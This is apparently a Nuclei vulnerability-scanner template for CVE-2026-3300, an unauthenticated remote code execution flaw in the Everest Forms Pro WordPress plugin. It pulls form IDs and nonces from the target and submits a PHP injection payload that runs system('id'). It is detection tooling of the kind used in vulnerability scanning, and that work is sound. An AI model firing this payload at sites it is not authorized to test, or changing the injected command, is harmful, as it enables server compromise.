id: CVE-2026-3300 info: name: Everest Forms Pro <= 1.9.12 - Unauthenticated RCE via Calculation Formula Injection author: DhiyaneshDk severity: critical description: | The Everest Forms Pro plugin for WordPress is vulnerable to Remote Code Execution via PHP Code Injection in all versions up to, and including, 1.9.12. This is due to the Calculation Addon's process_filter() function concatenating user-submitted form field values into a PHP code string without proper escaping before passing it to eval(). The sanitize_text_field() function applied to input does not escape single quotes or other PHP code context characters. This makes it possible for unauthenticated attackers to inject and execute arbitrary PHP code on the server by submitting a crafted value in any string-type form field (text, email, URL, select, radio) when a form uses the "Complex Calculation" feature. impact: | Unauthenticated attackers can execute arbitrary PHP code on the server, potentially leading to full system compromise. remediation: | Update to the latest version of Everest Forms Pro plugin. reference: - https://www.wordfence.com/threat-intel/vulnerabilities/id/389c0b89-e408-4ad5-9723-a16b745771f0?source=cve - https://plugins.trac.wordpress.org/browser/everest-forms/tags/3.4.3/includes/class-evf-form-task.php#L584 - https://everestforms.net/changelog/ - https://www.wordfence.com/blog/2026/06/attackers-actively-exploiting-critical-vulnerability-in-everest-forms-pro-plugin/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2026-3300 epss-score: 0.40992 epss-percentile: 0.98487 cwe-id: CWE-94 metadata: max-request: 3 verified: true product: everest-forms-pro vendor: wpeverest fofa-query: body="/wp-content/plugins/everest-forms-pro/" tags: cve,cve2026,wordpress,wp-plugin,everest-forms,rce,unauth,vkev flow: http(1) && http(2) && http(3) http: - method: GET path: - "{{BaseURL}}/wp-content/plugins/everest-forms-pro/readme.txt" matchers: - type: dsl dsl: - 'status_code == 200' - 'contains(body, "Everest Forms")' - 'compare_versions(version, "<= 1.9.12")' condition: and internal: true extractors: - type: regex name: version internal: true group: 1 regex: - 'Stable tag:\s*([0-9.]+)' - method: GET path: - "{{BaseURL}}/wp-json/wp/v2/pages?per_page=100" matchers: - type: dsl dsl: - 'status_code == 200' - 'contains(body, "evf-container","data-formid")' condition: and internal: true extractors: - type: regex name: form_id internal: true group: 1 regex: - 'data-formid=(?:\\"|")([0-9]+)' - type: regex name: nonce internal: true group: 1 regex: - 'name=(?:\\"|")_wpnonce[0-9]+(?:\\"|")\s+value=(?:\\"|")([a-f0-9]+)' - type: regex name: nonce_field internal: true group: 1 regex: - 'name=(?:\\"|")(_wpnonce[0-9]+)(?:\\"|")\s+value=' - type: regex name: text_field internal: true group: 1 regex: - 'evf-field-text[^>]*data-field-id=(?:\\"|")(field_[A-Za-z0-9]+)' - type: regex name: calc_field internal: true group: 1 regex: - 'evf-field-number[^>]*data-field-id=(?:\\"|")(field_[A-Za-z0-9]+)' - raw: - | POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded action=everest_forms_ajax_form_submission&everest_forms[id]={{form_id}}&everest_forms[author]=1&everest_forms[form_fields][{{text_field}}]=1'%3B+system('id')%3B+echo+'&everest_forms[form_fields][{{calc_field}}]=0&{{nonce_field}}={{nonce}} matchers-condition: and matchers: - type: regex part: body regex: - 'uid=[0-9]+\([a-z_-]+\)' - type: word part: body words: - '"success":true' extractors: - type: regex group: 0 regex: - 'uid=[0-9]+\([a-z_-]+\)\s*gid=[0-9]+\([a-z_-]+\)' # digest: 4a0a00473045022002e890b4d8b04cb01544288ccf7a10b8c9778cac317a234b3a6dc6b410f6cadc022100dbf0305b675a6645001eca0537d37cd958832938ac2b5349cfb146fbabacb46e:922c64590222798bb761d5b6d8e72950